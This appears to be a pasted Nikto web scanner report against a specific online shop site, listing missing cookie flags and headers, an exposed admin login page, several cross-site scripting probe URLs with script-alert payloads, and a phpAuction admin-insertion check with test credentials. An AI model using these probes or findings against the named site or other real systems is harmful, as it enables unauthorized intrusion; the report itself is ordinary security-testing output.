Advertisement
Guest User

Untitled

a guest
Oct 17th, 2016
700
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 3.76 KB | None | 0 0
  1. - Nikto v2.1.5
  2. ---------------------------------------------------------------------------
  3. + Target IP:          90.156.201.42
  4. + Target Hostname:    rexant-shop.ru
  5. + Target Port:        80
  6. + Start Time:         2016-10-17 18:37:47 (GMT3)
  7. ---------------------------------------------------------------------------
  8. + Server: Apache
  9. + Cookie PHPSESSID created without the httponly flag
  10. + The anti-clickjacking X-Frame-Options header is not present.
  11. + Server banner has changed from 'Apache' to 'nginx' which may suggest a WAF, load balancer or proxy is in place
  12. + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
  13. + OSVDB-59619: /inc/config.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
  14. + /index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  15. + OSVDB-2820: /index.php?dir=<script>alert('Vulnerable')</script>: Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
  16. + OSVDB-50552: /index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  17. + /index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
  18. + /index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  19. + OSVDB-50553: /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  20. + OSVDB-50553: /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  21. + OSVDB-38019: /?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  22. + OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
  23. + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
  24. + OSVDB-25497: /index.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
  25. + OSVDB-12606: /index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
  26. + OSVDB-2790: /index.php?vo=\"><script>alert(document.cookie);</script>: Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  27. + OSVDB-3092: /news: This might be interesting...
  28. + Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
  29. + OSVDB-3233: /icons/README: Apache default file found.
  30. + /admin/login.php: Admin login page/section found.
  31. + Cookie 226776f356d7ecf58b60bab12a05d38f created without the httponly flag
  32. + Cookie 21e558d425bf38e4a2473c40a5b0b2b9 created without the httponly flag
  33. + 6545 items checked: 0 error(s) and 23 item(s) reported on remote host
  34. + End Time:           2016-10-17 18:43:10 (GMT3) (323 seconds)
  35. ---------------------------------------------------------------------------
  36. + 1 host(s) tested
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement